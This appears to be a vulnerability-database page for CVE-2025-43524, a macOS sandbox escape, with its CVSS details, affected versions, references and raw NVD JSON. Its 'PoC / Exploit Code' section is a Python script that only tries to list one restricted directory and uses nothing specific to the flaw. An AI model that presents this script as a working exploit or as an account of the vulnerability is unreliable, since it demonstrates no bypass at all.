CVE-2025-43524

Description

An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.2. An app may be able to break out of its sandbox.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

macOS Sequoia < 15.7.7

macOS Sonoma < 14.8.7

macOS Tahoe < 26.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# PoC Concept for CVE-2025-43524 Sandbox Escape
# This script attempts to access a system directory outside the sandbox.
# On a vulnerable system, this access might be granted.

import os

def check_sandbox_bypass():
    target_path = "/private/var/root/System"
    print(f"[*] Attempting to access restricted path: {target_path}")
    
    try:
        # Attempt to list files in a restricted system directory
        files = os.listdir(target_path)
        print(f"[+] Sandbox bypass successful! Found {len(files)} entries.")
        print(f"[+] Content: {files}")
    except PermissionError:
        print("[-] Access denied. Sandbox is intact or patch applied.")
    except FileNotFoundError:
        print("[-] Path not found.")

if __name__ == "__main__":
    check_sandbox_bypass()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43524
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43524
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43524/
[4] VulDB https://vuldb.com/cve/CVE-2025-43524
[5] https://support.apple.com/en-us/125886

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43524", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:16:35.007", "lastModified": "2026-05-13T17:22:31.270", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An access issue was addressed with additional sandbox restrictions. This issue is fixed in macOS Sequoia 15.7.7, macOS Sonoma 14.8.7, macOS Tahoe 26.2. An app may be able to break out of its sandbox."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.0, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.7", "matchCriteriaId": "DD9E7FAE-30DA-4B2B-A63A-6DFEA7A29933"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.7", "matchCriteriaId": "2984C440-3DC2-413A-B5FA-1FAB21078DB8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "26.0", "versionEndExcluding": "26.2", "matchCriteriaId": "825BB848-93B2-4A3E-86D8-16CB37DF9302"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}